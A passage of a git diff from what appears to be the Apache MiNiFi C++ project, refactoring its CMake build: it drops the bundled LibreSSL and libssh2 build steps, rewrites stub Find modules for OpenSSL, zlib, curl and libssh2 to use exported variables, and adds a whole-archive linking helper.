-        set(PC copy /Y ${CMAKE_CURRENT_SOURCE_DIR_BACKSLASH}\\thirdparty\\libssh2\\CMakeLists.txt CMakeLists.txt)
-    else()
-        set(PC patch -p1 < ${CMAKE_CURRENT_SOURCE_DIR}/thirdparty/libssh2/libssh2-CMAKE_MODULE_PATH.patch)
-    endif()
-
-    set(LIBSSH2_CMAKE_ARGS ${PASSTHROUGH_CMAKE_ARGS}
-            "-DCMAKE_INSTALL_PREFIX=${CMAKE_CURRENT_BINARY_DIR}/thirdparty/libssh2-install"
-            -DENABLE_ZLIB_COMPRESSION=ON
-            -DCRYPTO_BACKEND=OpenSSL
-            -DBUILD_TESTING=OFF
-            -DBUILD_EXAMPLES=OFF)
-
-    list(APPEND CMAKE_MODULE_PATH_PASSTHROUGH_LIST ${CMAKE_CURRENT_SOURCE_DIR}/cmake/ssl)
-    list(APPEND LIBSSH2_CMAKE_ARGS "-DLIBRESSL_BIN_DIR=${LIBRESSL_BIN_DIR}"
-            "-DLIBRESSL_SRC_DIR=${LIBRESSL_SRC_DIR}"
-            "-DBYPRODUCT_PREFIX=${BYPRODUCT_PREFIX}"
-            "-DBYPRODUCT_SUFFIX=${BYPRODUCT_SUFFIX}")
-    if(NOT USE_SYSTEM_ZLIB OR USE_SYSTEM_ZLIB STREQUAL "OFF")
-        list(APPEND CMAKE_MODULE_PATH_PASSTHROUGH_LIST ${CMAKE_CURRENT_SOURCE_DIR}/cmake/zlib/dummy)
-        list(APPEND LIBSSH2_CMAKE_ARGS "-DZLIB_BYPRODUCT_INCLUDE=${ZLIB_BYPRODUCT_INCLUDE}"
-                "-DZLIB_BYPRODUCT=${ZLIB_BYPRODUCT}")
-    endif()
-    if(CMAKE_MODULE_PATH_PASSTHROUGH_LIST)
-        string(REPLACE ";" "%" CMAKE_MODULE_PATH_PASSTHROUGH "${CMAKE_MODULE_PATH_PASSTHROUGH_LIST}")
-        list(APPEND LIBSSH2_CMAKE_ARGS "-DCMAKE_MODULE_PATH=${CMAKE_MODULE_PATH_PASSTHROUGH}")
-    endif()
-
-    ExternalProject_Add(
-            libssh2-external
-            URL "https://www.libssh2.org/download/libssh2-1.8.2.tar.gz"
-            URL_HASH "SHA256=088307d9f6b6c4b8c13f34602e8ff65d21c2dc4d55284dfe15d502c4ee190d67"
-            SOURCE_DIR "${CMAKE_CURRENT_BINARY_DIR}/thirdparty/libssh2-src"
-            LIST_SEPARATOR % # This is needed for passing semicolon-separated lists
-            CMAKE_ARGS ${LIBSSH2_CMAKE_ARGS}
-            PATCH_COMMAND ${PC}
-            BUILD_BYPRODUCTS "${CMAKE_CURRENT_BINARY_DIR}/thirdparty/libssh2-install/${BYPRODUCT}"
-    )
-
-    add_dependencies(libssh2-external libressl-portable)
-    if(NOT USE_SYSTEM_ZLIB OR USE_SYSTEM_ZLIB STREQUAL "OFF")
-        add_dependencies(libssh2-external z)
-    endif()
-
-    set(LIBSSH2_SRC_DIR "${CMAKE_CURRENT_SOURCE_DIR}/thirdparty/libssh2/" CACHE STRING "" FORCE)
-    set(LIBSSH2_BIN_DIR "${CMAKE_CURRENT_BINARY_DIR}/thirdparty/libssh2-install/" CACHE STRING "" FORCE)
-    set(LIBSSH2_BYPRODUCT_DIR "${BYPRODUCT}" CACHE STRING "" FORCE)
-
-    add_library(libssh2 STATIC IMPORTED)
-    set_target_properties(libssh2 PROPERTIES IMPORTED_LOCATION "${LIBSSH2_BIN_DIR}${BYPRODUCT}")
-
-    if (OPENSSL_FOUND)
-        if (NOT WIN32)
-            set_target_properties(libssh2 PROPERTIES INTERFACE_LINK_LIBRARIES "${OPENSSL_LIBRARIES}")
-        endif()
-    endif(OPENSSL_FOUND)
-    if (ZLIB_FOUND)
-        if (NOT WIN32)
-            set_target_properties(libssh2 PROPERTIES INTERFACE_LINK_LIBRARIES "${ZLIB_LIBRARIES}")
-        endif()
-    endif(ZLIB_FOUND)
-    add_dependencies(libssh2 libssh2-external)
-    set(LIBSSH2_FOUND "YES" CACHE STRING "" FORCE)
-    set(LIBSSH2_INCLUDE_DIR "${CMAKE_CURRENT_SOURCE_DIR}/thirdparty/libssh2/include" CACHE STRING "" FORCE)
-    set(LIBSSH2_LIBRARY "${LIBSSH2_BIN_DIR}${BYPRODUCT}" CACHE STRING "" FORCE)
-    set(LIBSSH2_LIBRARIES ${LIBSSH2_LIBRARY} CACHE STRING "" FORCE)
-endfunction(use_libre_ssl)
\ No newline at end of file
diff --git a/cmake/LibreSSL.cmake b/cmake/LibreSSL.cmake
deleted file mode 100644
index b208e5f..0000000
--- a/cmake/LibreSSL.cmake
+++ /dev/null
@@ -1,63 +0,0 @@
-# Licensed to the Apache Software Foundation (ASF) under one
-# or more contributor license agreements.  See the NOTICE file
-# distributed with this work for additional information
-# regarding copyright ownership.  The ASF licenses this file
-# to you under the Apache License, Version 2.0 (the
-# "License"); you may not use this file except in compliance
-# with the License.  You may obtain a copy of the License at
-#
-#   http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing,
-# software distributed under the License is distributed on an
-# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
-# KIND, either express or implied.  See the License for the
-# specific language governing permissions and limitations
-# under the License.
-
-function(use_libre_ssl SOURCE_DIR BINARY_DIR)
-	message("Using bundled LibreSSL from release")
-	
-	set(BYPRODUCT_PREFIX "lib" CACHE STRING "" FORCE)
-	set(BYPRODUCT_SUFFIX ".a" CACHE STRING "" FORCE)
-	
-	set(BUILD_ARGS "")
-	if (WIN32)
-		set(BYPRODUCT_SUFFIX ".lib" CACHE STRING "" FORCE)
-		set(BYPRODUCT_PREFIX "" CACHE STRING "" FORCE)
-	set(BUILD_ARGS " -GVisual Studio 15 2017")
-	endif(WIN32)
-	ExternalProject_Add(
-	libressl-portable
-	URL https://cdn.openbsd.org/pub/OpenBSD/LibreSSL/libressl-2.8.3.tar.gz https://ftp.openbsd.org/pub/OpenBSD/LibreSSL/libressl-2.8.3.tar.gz https://gentoo.osuosl.org/distfiles/libressl-2.8.3.tar.gz
-	URL_HASH "SHA256=9b640b13047182761a99ce3e4f000be9687566e0828b4a72709e9e6a3ef98477"
-	SOURCE_DIR "${BINARY_DIR}/thirdparty/libressl-src"
-	CMAKE_ARGS ${PASSTHROUGH_CMAKE_ARGS}
-				"-DCMAKE_INSTALL_PREFIX=${BINARY_DIR}/thirdparty/libressl-install"
-				"-DLIBRESSL_APPS=OFF"
-				"-DLIBRESSL_TESTS=OFF"
-				"${BUILD_ARGS}"
-	)
-
-	add_library(crypto STATIC IMPORTED)
-	set_target_properties(crypto PROPERTIES IMPORTED_LOCATION "${BINARY_DIR}/thirdparty/libressl-install/lib/${BYPRODUCT_PREFIX}crypto${BYPRODUCT_SUFFIX}")
-	add_dependencies(crypto libressl-portable)
-					
-	add_library(ssl STATIC IMPORTED)
-	set_target_properties(ssl PROPERTIES IMPORTED_LOCATION "${BINARY_DIR}/thirdparty/libressl-install/lib/${BYPRODUCT_PREFIX}ssl${BYPRODUCT_SUFFIX}")
-	set_target_properties(ssl PROPERTIES INTERFACE_LINK_LIBRARIES crypto)
-	add_dependencies(ssl libressl-portable)
-	
-	add_library(tls STATIC IMPORTED)
-	set_target_properties(tls PROPERTIES IMPORTED_LOCATION "${BINARY_DIR}/thirdparty/libressl-install/lib/${BYPRODUCT_PREFIX}tls${BYPRODUCT_SUFFIX}")
-	set_target_properties(tls PROPERTIES INTERFACE_LINK_LIBRARIES crypto)
-	add_dependencies(tls libressl-portable)
-	
-	set(LIBRESSL_SRC_DIR "${SOURCE_DIR}/thirdparty/libressl/" CACHE STRING "" FORCE)
-	set(LIBRESSL_BIN_DIR "${BINARY_DIR}/thirdparty/libressl-install/" CACHE STRING "" FORCE)
-
-	set(OPENSSL_FOUND "YES" CACHE STRING "" FORCE)
-	set(OPENSSL_INCLUDE_DIR "${SOURCE_DIR}/thirdparty/libressl/include" CACHE STRING "" FORCE)
-	set(OPENSSL_LIBRARIES "${BINARY_DIR}/thirdparty/libressl-install/lib/${BYPRODUCT_PREFIX}tls${BYPRODUCT_SUFFIX}" "${BINARY_DIR}/thirdparty/libressl-install/lib/${BYPRODUCT_PREFIX}ssl${BYPRODUCT_SUFFIX}" "${BINARY_DIR}/thirdparty/libressl-install/lib/${BYPRODUCT_PREFIX}crypto${BYPRODUCT_SUFFIX}" CACHE STRING "" FORCE)
-	
-endfunction(use_libre_ssl) 
diff --git a/cmake/WholeArchive.cmake b/cmake/WholeArchive.cmake
new file mode 100644
index 0000000..60db5f6
--- /dev/null
+++ b/cmake/WholeArchive.cmake
@@ -0,0 +1,31 @@
+# Licensed to the Apache Software Foundation (ASF) under one
+# or more contributor license agreements.  See the NOTICE file
+# distributed with this work for additional information
+# regarding copyright ownership.  The ASF licenses this file
+# to you under the Apache License, Version 2.0 (the
+# "License"); you may not use this file except in compliance
+# with the License.  You may obtain a copy of the License at
+#
+#   http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing,
+# software distributed under the License is distributed on an
+# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+# KIND, either express or implied.  See the License for the
+# specific language governing permissions and limitations
+# under the License.
+
+function(target_wholearchive_library TARGET ITEM)
+    if (APPLE)
+        target_link_libraries(${TARGET} ${ITEM})
+        target_link_libraries(${TARGET} -Wl,-force_load,$<TARGET_FILE:${ITEM}>)
+        add_dependencies(${TARGET} ${ITEM})
+    elseif(WIN32)
+        target_link_libraries(${TARGET} ${ITEM})
+        set_property(TARGET ${TARGET} APPEND PROPERTY LINK_OPTIONS "/WHOLEARCHIVE:${ITEM}")
+        add_dependencies(${TARGET} ${ITEM})
+    else()
+        target_link_libraries(${TARGET} -Wl,--whole-archive ${ITEM} -Wl,--no-whole-archive)
+        add_dependencies(${TARGET} ${ITEM})
+    endif()
+endfunction(target_wholearchive_library)
diff --git a/cmake/civetweb/dummy/FindCivetWeb.cmake b/cmake/civetweb/dummy/FindCivetWeb.cmake
new file mode 100644
index 0000000..420db11
--- /dev/null
+++ b/cmake/civetweb/dummy/FindCivetWeb.cmake
@@ -0,0 +1,22 @@
+# Licensed to the Apache Software Foundation (ASF) under one
+# or more contributor license agreements.  See the NOTICE file
+# distributed with this work for additional information
+# regarding copyright ownership.  The ASF licenses this file
+# to you under the Apache License, Version 2.0 (the
+# "License"); you may not use this file except in compliance
+# with the License.  You may obtain a copy of the License at
+#
+#   http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing,
+# software distributed under the License is distributed on an
+# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+# KIND, either express or implied.  See the License for the
+# specific language governing permissions and limitations
+# under the License.
+
+if (NOT CIVETWEB_FOUND)
+    set(CIVETWEB_FOUND "YES" CACHE STRING "" FORCE)
+    set(CIVETWEB_INCLUDE_DIR "${EXPORT_CIVETWEB_INCLUDE_DIR}" CACHE STRING "" FORCE)
+    set(CIVETWEB_LIBRARIES "${EXPORT_CIVETWEB_LIBRARIES}" CACHE STRING "" FORCE)
+endif()
\ No newline at end of file
diff --git a/cmake/curl/dummy/FindCURL.cmake b/cmake/curl/dummy/FindCURL.cmake
index d179cb2..72802bb 100644
--- a/cmake/curl/dummy/FindCURL.cmake
+++ b/cmake/curl/dummy/FindCURL.cmake
@@ -14,7 +14,11 @@
 # KIND, either express or implied.  See the License for the
 # specific language governing permissions and limitations
 # under the License.
-set(CURL_FOUND "YES" CACHE STRING "" FORCE)
-set(CURL_INCLUDE_DIR "${CURL_SRC_DIR}/include" CACHE STRING "" FORCE)
-set(CURL_LIBRARY "${CURL_BIN_DIR}${CURL_BYPRODUCT_DIR}" CACHE STRING "" FORCE)
-set(CURL_LIBRARIES "${CURL_BIN_DIR}${CURL_BYPRODUCT_DIR}" CACHE STRING "" FORCE)
+
+if(NOT CURL_FOUND)
+    set(CURL_FOUND "YES" CACHE STRING "" FORCE)
+    set(CURL_INCLUDE_DIR "${EXPORTED_CURL_INCLUDE_DIR}" CACHE STRING "" FORCE)
+    set(CURL_INCLUDE_DIRS "${CURL_INCLUDE_DIR}" CACHE STRING "" FORCE)
+    set(CURL_LIBRARY "${EXPORTED_CURL_LIBRARY}" CACHE STRING "" FORCE)
+    set(CURL_LIBRARIES "${CURL_LIBRARY}" CACHE STRING "" FORCE)
+endif()
diff --git a/cmake/libssh2/dummy/FindLibSSH2.cmake b/cmake/libssh2/dummy/FindLibSSH2.cmake
index 64a7f23..9366abe 100644
--- a/cmake/libssh2/dummy/FindLibSSH2.cmake
+++ b/cmake/libssh2/dummy/FindLibSSH2.cmake
@@ -15,9 +15,8 @@
 # specific language governing permissions and limitations
 # under the License.
 
-set(LIBSSH2_FOUND "YES" CACHE STRING "" FORCE)
-set(LIBSSH2_INCLUDE_DIR "${LIBSSH2_SRC_DIR}/include" CACHE STRING "" FORCE)
-set(LIBSSH2_LIBRARY "${LIBSSH2_BIN_DIR}${LIBSSH2_BYPRODUCT_DIR}" CACHE STRING "" FORCE)
-set(LIBSSH2_LIBRARIES "${LIBSSH2_BIN_DIR}${LIBSSH2_BYPRODUCT_DIR}" CACHE STRING "" FORCE)
-
-message("LibSSH2 LIB is located at is ${LIBSSH2_LIBRARIES}")
\ No newline at end of file
+if(NOT LIBSSH2_FOUND)
+    set(LIBSSH2_FOUND "YES" CACHE STRING "" FORCE)
+    set(LIBSSH2_INCLUDE_DIR "${EXPORTED_LIBSSH2_INCLUDE_DIR}" CACHE STRING "" FORCE)
+    set(LIBSSH2_LIBRARY "${EXPORTED_LIBSSH2_LIBRARY}" CACHE STRING "" FORCE)
+endif()
diff --git a/cmake/rocksdb/sys/FindRocksDB.cmake b/cmake/rocksdb/sys/FindRocksDB.cmake
new file mode 100644
index 0000000..657918a
--- /dev/null
+++ b/cmake/rocksdb/sys/FindRocksDB.cmake
@@ -0,0 +1,60 @@
+# Licensed to the Apache Software Foundation (ASF) under one
+# or more contributor license agreements.  See the NOTICE file
+# distributed with this work for additional information
+# regarding copyright ownership.  The ASF licenses this file
+# to you under the Apache License, Version 2.0 (the
+# "License"); you may not use this file except in compliance
+# with the License.  You may obtain a copy of the License at
+# 
+#   http://www.apache.org/licenses/LICENSE-2.0
+# 
+# Unless required by applicable law or agreed to in writing,
+# software distributed under the License is distributed on an
+# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+# KIND, either express or implied.  See the License for the
+# specific language governing permissions and limitations
+# under the License.
+
+#  ROCKSDB_FOUND               System has RocksDB library/headers.
+#  ROCKSDB_LIBRARIES           The RocksDB library.
+#  ROCKSDB_INCLUDE_DIR        The location of RocksDB headers.
+
+find_path(ROCKSDB_ROOT_DIR
+    NAMES include/rocksdb/db.h
+)
+
+find_library(ROCKSDB_LIBRARIES
+    NAMES rocksdb
+    HINTS ${ROCKSDB_ROOT_DIR}/lib
+)
+
+find_path(ROCKSDB_INCLUDE_DIR
+    NAMES rocksdb/db.h
+    HINTS ${ROCKSDB_ROOT_DIR}/include
+)
+
+include(FindPackageHandleStandardArgs)
+find_package_handle_standard_args(RocksDB DEFAULT_MSG
+    ROCKSDB_LIBRARIES
+    ROCKSDB_INCLUDE_DIR
+)
+
+mark_as_advanced(
+    ROCKSDB_ROOT_DIR
+    ROCKSDB_LIBRARIES
+    ROCKSDB_INCLUDE_DIR
+)
+
+if(ROCKSDB_INCLUDE_DIR AND ROCKSDB_LIBRARIES)
+  set(ROCKSDB_FOUND "YES")
+  message(STATUS "Found RocksDB...${ROCKSDB_LIBRARIES}")
+endif()
+
+if(NOT TARGET RocksDB::RocksDB)
+  add_library(RocksDB::RocksDB UNKNOWN IMPORTED)
+  set_target_properties(RocksDB::RocksDB PROPERTIES
+          INTERFACE_INCLUDE_DIRECTORIES "${ROCKSDB_INCLUDE_DIR}")
+  set_target_properties(RocksDB::RocksDB PROPERTIES
+          IMPORTED_LINK_INTERFACE_LANGUAGES "CXX"
+          IMPORTED_LOCATION "${ROCKSDB_LIBRARIES}")
+endif()
\ No newline at end of file
diff --git a/cmake/ssl/FindOpenSSL.cmake b/cmake/ssl/FindOpenSSL.cmake
index 0ecdf2e..087b1ce 100644
--- a/cmake/ssl/FindOpenSSL.cmake
+++ b/cmake/ssl/FindOpenSSL.cmake
@@ -17,31 +17,29 @@
 
 # Dummy OpenSSL find for when we use bundled version
 
-set(OPENSSL_FOUND "YES" CACHE STRING "" FORCE)
-set(OPENSSL_INCLUDE_DIR "${LIBRESSL_SRC_DIR}/include" CACHE STRING "" FORCE)
-set(OPENSSL_CRYPTO_LIBRARY "${LIBRESSL_BIN_DIR}/lib/${BYPRODUCT_PREFIX}crypto${BYPRODUCT_SUFFIX}" CACHE STRING "" FORCE)
-set(OPENSSL_SSL_LIBRARY "${LIBRESSL_BIN_DIR}/lib/${BYPRODUCT_PREFIX}ssl${BYPRODUCT_SUFFIX}" CACHE STRING "" FORCE)
-set(OPENSSL_LIBRARIES "${LIBRESSL_BIN_DIR}/lib/${BYPRODUCT_PREFIX}tls${BYPRODUCT_SUFFIX}" ${OPENSSL_SSL_LIBRARY} ${OPENSSL_CRYPTO_LIBRARY} CACHE STRING "" FORCE)
-set(OPENSSL_VERSION "1.0.2" CACHE STRING "" FORCE)
+if(NOT OPENSSL_FOUND)
+  set(OPENSSL_FOUND "YES" CACHE STRING "" FORCE)
+  set(OPENSSL_INCLUDE_DIR "${EXPORTED_OPENSSL_INCLUDE_DIR}" CACHE STRING "" FORCE)
+  set(OPENSSL_CRYPTO_LIBRARY "${EXPORTED_OPENSSL_CRYPTO_LIBRARY}" CACHE STRING "" FORCE)
+  set(OPENSSL_SSL_LIBRARY "${EXPORTED_OPENSSL_SSL_LIBRARY}" CACHE STRING "" FORCE)
+  set(OPENSSL_LIBRARIES ${EXPORTED_OPENSSL_LIBRARIES} CACHE STRING "" FORCE)
+  set(OPENSSL_VERSION "1.0.2" CACHE STRING "" FORCE)
+endif()
 
- if(NOT TARGET OpenSSL::Crypto )
-    add_library(OpenSSL::Crypto UNKNOWN IMPORTED)
-    set_target_properties(OpenSSL::Crypto PROPERTIES
-      INTERFACE_INCLUDE_DIRECTORIES "${OPENSSL_INCLUDE_DIR}")
-    
-      set_target_properties(OpenSSL::Crypto PROPERTIES
-        IMPORTED_LINK_INTERFACE_LANGUAGES "C"
-        IMPORTED_LOCATION "${OPENSSL_CRYPTO_LIBRARY}")
-    
-  endif()
+if(NOT TARGET OpenSSL::Crypto)
+  add_library(OpenSSL::Crypto UNKNOWN IMPORTED)
+  set_target_properties(OpenSSL::Crypto PROPERTIES
+          INTERFACE_INCLUDE_DIRECTORIES "${OPENSSL_INCLUDE_DIR}")
+  set_target_properties(OpenSSL::Crypto PROPERTIES
+          IMPORTED_LINK_INTERFACE_LANGUAGES "C"
+          IMPORTED_LOCATION "${OPENSSL_CRYPTO_LIBRARY}")
+endif()
 
-  if(NOT TARGET OpenSSL::SSL
-      )
-    add_library(OpenSSL::SSL UNKNOWN IMPORTED)
-    set_target_properties(OpenSSL::SSL PROPERTIES
-      INTERFACE_INCLUDE_DIRECTORIES "${OPENSSL_INCLUDE_DIR}")
-          set_target_properties(OpenSSL::SSL PROPERTIES
-        IMPORTED_LINK_INTERFACE_LANGUAGES "C"
-        IMPORTED_LOCATION "${OPENSSL_SSL_LIBRARY}")
-    
-  endif()
+if(NOT TARGET OpenSSL::SSL)
+  add_library(OpenSSL::SSL UNKNOWN IMPORTED)
+  set_target_properties(OpenSSL::SSL PROPERTIES
+          INTERFACE_INCLUDE_DIRECTORIES "${OPENSSL_INCLUDE_DIR}")
+  set_target_properties(OpenSSL::SSL PROPERTIES
+          IMPORTED_LINK_INTERFACE_LANGUAGES "C"
+          IMPORTED_LOCATION "${OPENSSL_SSL_LIBRARY}")
+endif()
diff --git a/cmake/winssl/FindOpenSSL.cmake b/cmake/winssl/FindOpenSSL.cmake
deleted file mode 100644
index 1830efa..0000000
--- a/cmake/winssl/FindOpenSSL.cmake
+++ /dev/null
@@ -1,18 +0,0 @@
-# Licensed to the Apache Software Foundation (ASF) under one
-# or more contributor license agreements.  See the NOTICE file
-# distributed with this work for additional information
-# regarding copyright ownership.  The ASF licenses this file
-# to you under the Apache License, Version 2.0 (the
-# "License"); you may not use this file except in compliance
-# with the License.  You may obtain a copy of the License at
-# 
-#   http://www.apache.org/licenses/LICENSE-2.0
-# 
-# Unless required by applicable law or agreed to in writing,
-# software distributed under the License is distributed on an
-# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
-# KIND, either express or implied.  See the License for the
-# specific language governing permissions and limitations
-# under the License.
-
-# Dummy OpenSSL find for when we use bundled version
\ No newline at end of file
diff --git a/cmake/zlib/dummy/FindZLIB.cmake b/cmake/zlib/dummy/FindZLIB.cmake
index 038dacd..f9a242f 100644
--- a/cmake/zlib/dummy/FindZLIB.cmake
+++ b/cmake/zlib/dummy/FindZLIB.cmake
@@ -16,24 +16,21 @@
 # under the License.
 
 # Dummy zlib find for when we use bundled version
+if(NOT ZLIB_FOUND)
   set(ZLIB_FOUND "YES" CACHE STRING "" FORCE)
-    
-  set(ZLIB_INCLUDE_DIR "${ZLIB_BYPRODUCT_INCLUDE}" CACHE STRING "" FORCE)
-  set(ZLIB_INCLUDE_DIRS "${ZLIB_BYPRODUCT_INCLUDE}" CACHE STRING "" FORCE)
-  
-  set(ZLIB_LIBRARY "${ZLIB_BYPRODUCT}" CACHE STRING "" FORCE)
-  set(ZLIB_LIBRARIES "${ZLIB_LIBRARY}" CACHE STRING "" FORCE)
-  set(ZLIB_LIBRARY_RELEASE "${ZLIB_LIBRARY}" CACHE STRING "" FORCE)
-  set(ZLIB_LIBRARY_DEBUG "${ZLIB_LIBRARY}" CACHE STRING "" FORCE)
-  message("ZLIB LIB is located at is ${ZLIB_LIBRARIES}")
-  
-  if(NOT TARGET ZLIB::ZLIB
-      )
-    add_library(ZLIB::ZLIB UNKNOWN IMPORTED)
-    set_target_properties(ZLIB::ZLIB PROPERTIES
-      INTERFACE_INCLUDE_DIRECTORIES "${ZLIB_INCLUDE_DIR}")
-          set_target_properties(ZLIB::ZLIB PROPERTIES
-        IMPORTED_LINK_INTERFACE_LANGUAGES "C"
-        IMPORTED_LOCATION "${ZLIB_LIBRARY}")
-    
-  endif()
\ No newline at end of file
+  set(ZLIB_INCLUDE_DIRS "${EXPORTED_ZLIB_INCLUDE_DIRS}" CACHE STRING "" FORCE)
+  set(ZLIB_LIBRARIES "${EXPORTED_ZLIB_LIBRARIES}" CACHE STRING "" FORCE)
+  set(ZLIB_VERSION_STRING "${EXPORTED_ZLIB_VERSION_STRING}" CACHE STRING "" FORCE)
+  set(ZLIB_VERSION_MAJOR "${EXPORTED_ZLIB_VERSION_MAJOR}" CACHE STRING "" FORCE)
+  set(ZLIB_VERSION_MINOR "${EXPORTED_ZLIB_VERSION_MINOR}" CACHE STRING "" FORCE)
+  set(ZLIB_VERSION_PATCH "${EXPORTED_ZLIB_VERSION_PATCH}" CACHE STRING "" FORCE)
+endif()
+
+if(NOT TARGET ZLIB::ZLIB)
+  add_library(ZLIB::ZLIB STATIC IMPORTED)
+  set_target_properties(ZLIB::ZLIB PROPERTIES
+          INTERFACE_INCLUDE_DIRECTORIES "${ZLIB_INCLUDE_DIRS}")
+  set_target_properties(ZLIB::ZLIB PROPERTIES
+          IMPORTED_LINK_INTERFACE_LANGUAGES "C"
+          IMPORTED_LOCATION "${ZLIB_LIBRARIES}")
+endif()
\ No newline at end of file
diff --git a/controller/CMakeLists.txt b/controller/CMakeLists.txt
index 9ab9cfb..3e35b76 100644
--- a/controller/CMakeLists.txt
+++ b/controller/CMakeLists.txt
@@ -25,7 +25,7 @@
 
 
 
-include_directories(../main/ ../libminifi/include  ../libminifi/include/c2  ../libminifi/include/c2/protocols/  ../libminifi/include/core/state ./libminifi/include/core/statemanagement/metrics  ../libminifi/include/core/yaml  ../libminifi/include/core  ../thirdparty/cron ../thirdparty/spdlog-20170710/include ../thirdparty/concurrentqueue ../thirdparty/yaml-cpp-yaml-cpp-20171024/include ${CIVET_THIRDPARTY_ROOT}/include ../thirdparty/cxxopts/include  ../thirdparty/)
+include_directories(../main/ ../libminifi/include  ../libminifi/include/c2  ../libminifi/include/c2/protocols/  ../libminifi/include/core/state ./libminifi/include/core/statemanagement/metrics  ../libminifi/include/core/yaml  ../libminifi/include/core)
 
 
 if(WIN32)
@@ -54,49 +54,16 @@
   target_link_libraries(minificontroller "${CMAKE_THREAD_LIBS_INIT}")
 endif()
 
-# Include OpenSSL
-find_package(OpenSSL)
-if (OPENSSL_FOUND)
-include_directories(${OPENSSL_INCLUDE_DIR})
-endif(OPENSSL_FOUND)
+target_wholearchive_library(minificontroller minifi)
 
-# Link against minifi, yaml-cpp, civetweb-cpp, uuid, openssl, jsoncpp and rocksdb
-target_link_libraries(minificontroller minifi ${DL})
+target_link_libraries(minificontroller cxxopts)
 
+get_property(extensions GLOBAL PROPERTY EXTENSION-OPTIONS)
+foreach(EXTENSION ${extensions})
+	target_wholearchive_library(minificontroller ${EXTENSION})
+endforeach()
 
-add_dependencies(minificontroller minifi)
-
-if (APPLE)
-	target_link_libraries (minificontroller -Wl,-all_load minifi)
-else ()
-	target_link_libraries (minificontroller -Wl,--whole-archive minifi -Wl,--no-whole-archive)
-endif ()
-
-if (WIN32)
-	include_directories("../thirdparty/Simple-Windows-Posix-Semaphore")
-  	target_link_libraries(minificontroller semaphore)
-endif()
-
-target_link_libraries(minificontroller yaml-cpp c-library civetweb-cpp ${JSON_CPP_LIB} cxxopts)
-
-
-if (APPLE)
-	get_property(extensions GLOBAL PROPERTY EXTENSION-OPTIONS)
-	foreach(EXTENSION ${extensions})
-		message("Linking against ${EXTENSION}")
-		add_dependencies(minificontroller ${EXTENSION})
-		target_link_libraries (minificontroller -Wl,-all_load ${EXTENSION})
-	endforeach()    
-else ()
-	get_property(extensions GLOBAL PROPERTY EXTENSION-OPTIONS)
-	foreach(EXTENSION ${extensions})
-	add_dependencies(minificontroller ${EXTENSION})
-	  target_link_libraries (minificontroller -Wl,--whole-archive ${EXTENSION} -Wl,--no-whole-archive)
-	endforeach()
-endif ()
-
-set_target_properties(minificontroller
-        PROPERTIES OUTPUT_NAME minificontroller)
+set_target_properties(minificontroller PROPERTIES OUTPUT_NAME minificontroller)
 
 install(TARGETS minificontroller
         RUNTIME
diff --git a/controller/MiNiFiController.cpp b/controller/MiNiFiController.cpp
index c696e38..c87dbfa 100644
--- a/controller/MiNiFiController.cpp
+++ b/controller/MiNiFiController.cpp
@@ -22,7 +22,6 @@
 #include <vector>
 #include <queue>
 #include <map>
-#include <yaml-cpp/yaml.h>
 #include <iostream>
 #include "io/BaseStream.h"
 
diff --git a/extensions/ExtensionHeader.txt b/extensions/ExtensionHeader.txt
index 311e561..426a3e0 100644
--- a/extensions/ExtensionHeader.txt
+++ b/extensions/ExtensionHeader.txt
@@ -20,7 +20,7 @@
 cmake_minimum_required(VERSION 2.6)
 
 
-include_directories(../../libminifi/include  ../../libminifi/include/core/yaml  ../../libminifi/include/core  ../../thirdparty/cron  ../../thirdparty/spdlog-20170710/include ../../thirdparty/concurrentqueue ../../thirdparty/yaml-cpp-yaml-cpp-0.5.3/include ${CIVET_THIRDPARTY_ROOT}/include ../../thirdparty/)
+include_directories(../../libminifi/include ../../libminifi/include/core)
 
 if(WIN32)
 	include_directories(../../libminifi/opsys/win)
diff --git a/extensions/aws/CMakeLists.txt b/extensions/aws/CMakeLists.txt
index dc354e2..627b6df 100644
--- a/extensions/aws/CMakeLists.txt
+++ b/extensions/aws/CMakeLists.txt
@@ -22,67 +22,12 @@
 
 file(GLOB SOURCES "*.cpp" "s3/*.cpp" "controllerservices/*.cpp")
 
-set(BASE_DIR "${CMAKE_CURRENT_BINARY_DIR}/aws-sdk-cpp")
-set(BYPRODUCT "${CMAKE_CURRENT_BINARY_DIR}/aws-sdk-install/")
-
-
-if(STATIC_BUILD)
-    set(MINIFI_AWS_BUILD_SHARED_LIBS "OFF")
-    set(MINIFI_AWS_UNITY_BUILD "ON")
-else()
-    set(MINIFI_AWS_BUILD_SHARED_LIBS "ON")
-    set(MINIFI_AWS_UNITY_BUILD "OFF")
-endif()
-
-# AWS SDK 1.7.89
-ExternalProject_Add(
-        awssdk-external
-        GIT_REPOSITORY "https://github.com/aws/aws-sdk-cpp.git"
-        GIT_TAG "66666d9437429c28927576cb5c898e490f8c8cf9"
-        EXCLUDE_FROM_ALL TRUE
-        INSTALL_DIR ${BYPRODUCT}
-        CMAKE_ARGS -DBUILD_ONLY=s3
-        -DENABLE_TESTING=OFF
-        -DBUILD_SHARED_LIBS=${MINIFI_AWS_BUILD_SHARED_LIBS}
-        -DENABLE_UNITY_BUILD=${MINIFI_AWS_UNITY_BUILD}
-        -DCMAKE_BUILD_TYPE=RelWithDebInfo
-        -DCMAKE_INSTALL_PREFIX=${BYPRODUCT}
-)
-
-add_library(awssdklib STATIC IMPORTED)
-set_target_properties(awssdklib PROPERTIES IMPORTED_LOCATION "${BYPRODUCT}")
-
-set(AWSSDK_FOUND "YES" CACHE STRING "" FORCE)
-set(AWSSDK_INCLUDE_DIRS "${BYPRODUCT}/include" CACHE STRING "" FORCE)
-set(AWSSDK_LIBRARIES awssdklib CACHE STRING "" FORCE)
-set(AWSSDK_LIBRARY awssdklib CACHE STRING "" FORCE)
-
-include_directories(${AWSSDK_INCLUDE_DIRS})
 add_library(minifi-aws STATIC ${SOURCES})
 
-if(STATIC_BUILD)
-    set(SUFFIX "a")
-else()
-    if(APPLE)
-        set(SUFFIX "dylib")
-    else()
-        set(SUFFIX "so")
-    endif()
-endif()
